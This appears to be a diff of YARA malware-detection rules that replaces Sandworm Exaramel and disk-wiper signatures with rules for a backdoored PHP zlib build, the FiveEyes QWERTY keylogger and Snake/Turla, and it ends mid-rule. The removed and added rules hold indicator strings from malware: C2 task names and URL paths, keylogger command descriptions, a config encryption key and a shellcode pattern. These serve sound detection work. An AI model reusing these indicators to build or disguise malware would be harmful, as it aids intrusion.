 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f65d59381403534a2c2f39d66c7c62bf1540eafc9aad1ad73de1809e91c42446"
-		score = 80
-		quality = 85
-		tags = ""
+		logic_hash = "ac1cd4f2162d2c8415e2ee5167cabb8e8aff08a06afe244f5bfe099f2d3fbeb4"
+		score = 75
+		quality = 83
+		tags = "CVE-2018-0802, FILE"
 
 	strings:
-		$ = "configtx.json"
+		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
+		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{308,310}2500/ ascii nocase
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Plaintext
+rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Zlib_Zerodium_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects contents of the configuration file used by Exaramel (plaintext)"
-		author = "FR/ANSSI/SDO"
-		id = "6f0d834b-e6c8-59e6-bf9a-b4fd9c0b2297"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L106-L118"
+		description = "Detects backdoored PHP zlib version"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5e0ab8f8-776a-52b0-b5be-ff1d34bccfd1"
+		date = "2021-03-29"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_php_zlib_backdoor.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "536327d5216372a3fd2f4dad0a21be2778ce2930212daf0a8628ecbdab49b46e"
-		score = 80
-		quality = 60
-		tags = ""
+		logic_hash = "74bfd9e12cb7671cde953d361a2adeb9388edd9b2aab0f9ce04dce0d433561dc"
+		score = 75
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$ = /\{"Hosts":\[".{10,512}"\],"Proxy":".{0,512}","Version":".{1,32}","Guid":"/
+		$x1 = "REMOVETHIS: sold to zerodium, mid 2017" fullword ascii
+		$x2 = "HTTP_USER_AGENTT" ascii fullword
 
 	condition:
-		all of them
+		filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Ciphertext
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20121
 {
 	meta:
-		description = "Detects contents of the configuration file used by Exaramel (encrypted with key odhyrfjcnfkdtslt, sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "763dbb17-2bad-5b40-8a7b-b71bc5849cd9"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L120-L132"
+		description = "FiveEyes QUERTY Malware - file 20121.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bf30bdbb-0153-5ae2-bf42-4bd9e4a2f088"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L3-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9dc7ee5b0a218a2b5be652e137fa090c944c3ddb0f699f521a72896668210813"
-		score = 80
+		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+		logic_hash = "e2660abf4959bc57bcf9d95d974cd20718d5d27f371109cb4526cee208544530"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 6F B6 08 E9 A3 0C 8D 5E DD BE D4 }
+		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20121.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
 
 	condition:
-		all of them
+		9 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Socket_Path
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Sys
 {
 	meta:
-		description = "Detects path of the unix socket created to prevent concurrent executions in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "3aab84c9-9748-5d11-9cd7-efa9151036cf"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L134-L146"
+		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0d0e3642-f5d4-59b2-8e56-a7c999e34775"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8c049b5a7b508ca0f160d166f3c726e4a23a2c5b3105d075d7bf7a301a1c58f6"
-		score = 80
+		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+		logic_hash = "881af0e2ff8fad2bca2ae05ad63b5185356181685daafa7a1b9992a1de017c9e"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "/tmp/.applocktx"
+		$s0 = "20123.dll" fullword ascii
+		$s1 = "kbdclass.sys" fullword wide
+		$s2 = "IoFreeMdl" fullword ascii
+		$s3 = "ntoskrnl.exe" fullword ascii
+		$s4 = "KfReleaseSpinLock" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Task_Names
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Cmddef
 {
 	meta:
-		description = "Detects names of the tasks received from the CC server in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "185f2f3b-bf5c-54af-bca2-400d08bf9c91"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L148-L167"
+		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "88a29288-9db5-5437-9efe-cdb823a2b928"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L47-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "193482da1e2b9509fa9c65d46edc56057f7b5d44b7408d918d4a9cbb60736dab"
-		score = 80
-		quality = 85
+		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+		logic_hash = "84776764caa79ad68f2dd0d2f890821c75f2efba7c46d674110ba870a40a372a"
+		score = 75
+		quality = 83
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "App.Delete"
-		$ = "App.SetServer"
-		$ = "App.SetProxy"
-		$ = "App.SetTimeout"
-		$ = "App.Update"
-		$ = "IO.ReadFile"
-		$ = "IO.WriteFile"
-		$ = "OS.ShellExecute"
+		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+		$s2 = "<commands/>" fullword ascii
+		$s3 = "</version>" fullword ascii
+		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s9 = "<minorType>0</minorType>" fullword ascii
+		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+		$s11 = "</comments>" fullword ascii
+		$s12 = "<comments>" fullword ascii
+		$s13 = "<majorType>1</majorType>" fullword ascii
+		$s14 = "<files>None</files>" fullword ascii
+		$s15 = "<poc>Erebus</poc>" fullword ascii
+		$s16 = "</plugin>" fullword ascii
+		$s17 = "<team>None</team>" fullword ascii
+		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
 
 	condition:
-		all of them
+		14 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Struct
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Dll
 {
 	meta:
-		description = "Detects the beginning of type _type struct for some of the most important structs in Exaramel malware"
-		author = "FR/ANSSI/SDO"
-		id = "8282e485-966c-554d-8e41-70dc1657f5ea"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L169-L185"
+		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a0dc146c-85fd-55b8-a5e0-bfc1f406507e"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L82-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "312d0598fa85837f94023036468fcae50e8b2de532430a944befa8090afe79f6"
-		score = 80
+		hash = "89504d91c5539a366e153894c1bc17277116342b"
+		logic_hash = "e735a7c26652cbf2bccac80a14568a3582b254ae25e2db56a46c09a714650611"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$struct_le_config = {70 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 47 2d 28 42 0? [2] 19}
-		$struct_le_worker = {30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 46 6a 13 e2 0? [2] 19}
-		$struct_le_client = {20 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 7b 6a 49 84 0? [2] 19}
-		$struct_le_report = {30 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 bf 35 0d f9 0? [2] 19}
-		$struct_le_task = {50 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 88 60 a1 c5 0? [2] 19}
+		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+		$s1 = "20121.dll" fullword ascii
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings_Typo
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20123
 {
 	meta:
-		description = "Detects misc strings in Exaramel malware with typos"
-		author = "FR/ANSSI/SDO"
-		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L187-L202"
+		description = "FiveEyes QUERTY Malware - file 20123.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "718d80c9-b6bb-5b73-9c17-49e7d6f77210"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L97-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "65e6de743eb9fc742674c7e54eef8a376963a6fd4380bacd03fe6f92d4235920"
-		score = 80
+		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+		logic_hash = "918462399af78b16a8214ceb1d39db554e3136efd4bc643353f0727e4a162516"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typo1 = "/sbin/init | awk "
-		$typo2 = "Syslog service for monitoring \n"
-		$typo3 = "Error.Can't update app! Not enough update archive."
-		$typo4 = ":\"metod\""
+		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+		$s2 = "<name>20123.sys</name>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+		$s5 = "<platform type=\"1\">" fullword ascii
+		$s6 = "</plugin>" fullword ascii
+		$s7 = "</pluginConfig>" fullword ascii
+		$s8 = "<pluginConfig>" fullword ascii
+		$s9 = "</platform>" fullword ascii
+		$s10 = "</lpConfig>" fullword ascii
+		$s11 = "<lpConfig>" fullword ascii
 
 	condition:
-		3 of ( $typo* )
+		9 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Strings
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Dll
 {
 	meta:
-		description = "Detects Strings used by Exaramel malware"
-		author = "FR/ANSSI/SDO (composed from 4 saparate rules by Florian Roth)"
-		id = "fdc79b87-eb9e-5751-9474-ff653b073165"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L204-L232"
+		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d23ac7bf-3e0c-5b59-a9dc-1ae0a4ae9c02"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L123-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d2790e60184ed973b2735263d0a997f32af0beacc9ea8ef65926fe6507011d5"
-		score = 80
-		quality = 85
+		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+		logic_hash = "fc3aac33c84d3b4a981c2d1a9358c54dc5ceca2017dbf2e2a51e1b6970b90796"
+		score = 75
+		quality = 83
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$persistence1 = "systemd"
-		$persistence2 = "upstart"
-		$persistence3 = "systemV"
-		$persistence4 = "freebsd rc"
-		$report1 = "systemdupdate.rep"
-		$report2 = "upstartupdate.rep"
-		$report3 = "remove.rep"
-		$url1 = "/tasks.get/"
-		$url2 = "/time.get/"
-		$url3 = "/time.set"
-		$url4 = "/tasks.report"
-		$url5 = "/attachment.get/"
-		$url6 = "/auth/app"
+		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" wide
+		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" wide
+		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+		$s3 = "- Log Used (number of windows) - %d" fullword wide
+		$s4 = "- Log Limit (number of windows) - %d" fullword wide
+		$s5 = "Process or User Default Language" fullword wide
+		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+		$s7 = "- Logging of keystrokes is switched ON" fullword wide
+		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
+		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+		$s11 = "FAILED to get Qwerty Status" fullword wide
+		$s12 = "- Successfully retrieved Log from Implant." fullword wide
+		$s13 = "- Logging of all Windows is toggled ON" fullword wide
+		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
+		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
+		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+		$s17 = "The implant failed to return a valid status" fullword ascii
+		$s18 = "- Log files were NOT generated!" fullword wide
+		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
 
 	condition:
-		(5 of ( $url* ) and all of ( $persistence* ) ) or ( all of ( $persistence* ) and all of ( $report* ) ) or ( 5 of ( $url* ) and all of ( $report* ) )
+		10 of them
 }
-rule SIGNATURE_BASE_MAL_WIPER_Unknown_Jun25 : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Cmddef
 {
 	meta:
-		description = "Detects unknown disk wiper first spotted in June 2025 and uploaded from Israel"
-		author = "Florian Roth"
-		id = "bd5ae026-389e-57fa-9b97-1062257de92e"
-		date = "2025-06-19"
-		modified = "2025-07-01"
-		reference = "https://x.com/cyb3rops/status/1935707307805134975"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L2-L22"
+		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dfa0693e-4e4c-59c8-9e51-e221aefd8662"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L158-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64569f65814d63e55ea938e3dd9bd359da4597328887bdacf37bb5545ea32424"
+		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+		logic_hash = "9c336a09adb5fdf3149e5d0ad716cb854f95effa4ce4dfe3e75f43031e4903ff"
 		score = 75
-		quality = 35
-		tags = "FILE"
-		hash1 = "12c39f052f030a77c0cd531df86ad3477f46d1287b8b98b625d1dcf89385d721"
+		quality = 83
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\CWipeNew\\Release\\" ascii fullword
-		$s1 = "Failed to get disk geometry: " wide fullword
-		$s2 = "--- Working on " wide fullword
+		$s0 = "This PPC gets the current keystroke log." fullword ascii
+		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
+		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+		$s8 = "<definition>display help for this function</definition>" fullword ascii
+		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+		$s10 = "Set the log limit (in number of windows)" fullword ascii
+		$s11 = "<example>qwgetlog</example>" fullword ascii
+		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+		$s16 = "<command id=\"32\">" fullword ascii
+		$s17 = "<command id=\"3\">" fullword ascii
+		$s18 = "<command id=\"7\">" fullword ascii
+		$s19 = "<command id=\"1\">" fullword ascii
+		$s20 = "<command id=\"4\">" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		10 of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_SH_Disk_Wiper_Script_Jun25 : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20120
 {
 	meta:
-		description = "Detects unknown disk wiper script for Linux systems"
-		author = "Florian Roth"
-		id = "837e5b22-2168-53f7-8d48-429a48e5a469"
-		date = "2025-06-19"
-		modified = "2025-07-01"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L23-L39"
+		description = "FiveEyes QUERTY Malware - file 20120.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "503c71de-1bc5-5690-944c-a60917a4da09"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L193-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99a0a393c2a636c10195c7ad85f3b282a30ba05fbc0f0db7fc04b0f79fbc6760"
-		score = 65
+		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+		logic_hash = "7d2617e0ee41ea475608757594cba8ae93f2dbb09b5d01d1fa3324b32ebb8aa0"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "f662f69fc7f4240cd8c00661db9484e76b5d02f903590140b4086fefcf9d9331"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "THIS SCRIPT IS LIVE AND ARMED!" ascii fullword
-		$s2 = "FAIR WARNING!" ascii fullword
-		$s3 = "lists devices" ascii fullword
+		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20120.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 2KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_PY_Pyinstaller_Swiper_Jun25 : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Cmddef
 {
 	meta:
-		description = "Detects suspicious Python based executable with similarities to a known disk wiper"
-		author = "Florian Roth"
-		id = "1b16598b-58df-599f-991b-00284b770d8e"
-		date = "2025-06-19"
-		modified = "2025-07-01"
-		reference = "https://x.com/cyb3rops/status/1935707307805134975"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L41-L59"
+		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2deb73f7-372e-5d29-a077-431ab1967d93"
+		date = "2015-01-18"
+		modified = "2023-12-05"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L218-L251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "824bdda031336b2d9a60b09bfa36e68a2e03159b217c9c25dd708df454144e1e"
-		score = 65
-		quality = 85
-		tags = "FILE"
-		hash1 = "4f669ecbe12e95d51f37be76933de4c2626d20bb01729086ce2efc603c4ffdf3"
+		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+		logic_hash = "d73f0e964bd57ed3a2cd782ac204a2b82a9b334e33d64dc61e6414654d7c38d3"
+		score = 75
+		quality = 83
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "bzlib1.dll" ascii fullword
-		$a2 = "VCRUNTIME140_1.dll" wide fullword
-		$a3 = "%s%c%s.exe" ascii fullword
-		$sc1 = { 73 77 69 70 65 72 00 00 00 }
+		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+		$s1 = "<message>Failed to get File Time</message>" fullword ascii
+		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+		$s3 = "<message>Failed to set File Time</message>" fullword ascii
+		$s4 = "</commands>" fullword ascii
+		$s5 = "<commands>" fullword ascii
+		$s6 = "</version>" fullword ascii
+		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
+		$s9 = "</error>" fullword ascii
+		$s10 = "<message>Invalid File Size</message>" fullword ascii
+		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+		$s12 = "<message>File Size Mismatch</message>" fullword ascii
+		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+		$s18 = "<minorType>0</minorType>" fullword ascii
+		$s19 = "<code>00001002</code>" fullword ascii
+		$s20 = "<code>00001001</code>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40000KB and all of them
+		12 of them
 }
-rule SIGNATURE_BASE_APT_MAL_IR_Druidfly_Wiper_Jun25 : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_1 : FILE
 {
 	meta:
-		description = "Detects Wiper used by the Iranian DruidFly group"
-		author = "Florian Roth"
-		id = "e3490d0e-369a-52ab-a9c1-b1c5b011c7db"
-		date = "2025-06-21"
-		modified = "2025-07-01"
-		reference = "https://x.com/threatintel/status/1936049254432231444"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L61-L87"
+		description = "Detects Snake / Turla Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ddbbd602-b7f0-5e14-be0f-0c84bb22ddeb"
+		date = "2017-05-04"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d3872506b03ea03a2c3cd7304c6b2d9dfafa04a29e19dc9be4924eaaa5db2d6"
